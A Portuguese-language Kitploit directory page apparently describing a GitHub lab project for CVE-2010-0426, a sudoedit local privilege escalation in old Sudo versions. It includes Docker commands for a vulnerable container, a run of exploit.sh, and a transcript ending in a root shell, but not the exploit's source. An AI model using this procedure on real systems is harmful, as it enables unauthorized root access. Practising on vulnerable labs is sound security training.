Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalação de Privilégios Local e container vulnerável | Kitploit
Ferramentas/GitHubGitHub/t0kx/privesc-cve-2010-0426
Escalada de PrivilégiosSegurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalação de Privilégios Local e container vulnerável

Ver Repositório
11134há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sudo 1.6.x<=1.6.9p21 e 1.7.x<=1.7.2p4 Escalação Local de Privilégios

Sudo (su "do") permite que um administrador de sistema conceda a certos usuários (ou grupos de usuários) a capacidade de executar alguns (ou todos) comandos como root enquanto registra todos os comandos e argumentos.

Ambiente vulnerável

Para configurar um ambiente vulnerável para o seu teste, você precisará ter o Docker instalado e basta executar o seguinte comando:

root@kitploit:~
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

E ele iniciará um shell interativo com baixos privilégios de usuário.

Código vulnerável

O bug foi encontrado no sudoedit, que não trata o comando 'sudoedit' corretamente; isso permite que um usuário malicioso substitua o comando sudoedit real por um comando arbitrário.

Atacantes locais podem explorar esse problema para executar comandos arbitrários como o usuário 'root'. Explorações bem-sucedidas podem comprometer completamente o computador afetado.

Exploit

Para explorar este alvo, basta executar:

root@kitploit:~
./exploit.sh

Se você estiver usando esta imagem vulnerável, basta executar:

root@kitploit:~
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Créditos

Esta falha foi encontrada por Slouching.

Aviso legal

Este e os programas anteriores são apenas para fins educacionais SOMENTE. Não os use sem permissão. O aviso legal usual se aplica, especialmente o fato de que eu (t0kx) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de internet não tem NENHUMA responsabilidade pelo conteúdo ou uso indevido destes programas ou de quaisquer derivados. Ao usar estes programas, você aceita o fato de que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é responsabilidade do t0kx.

Baixar ferramenta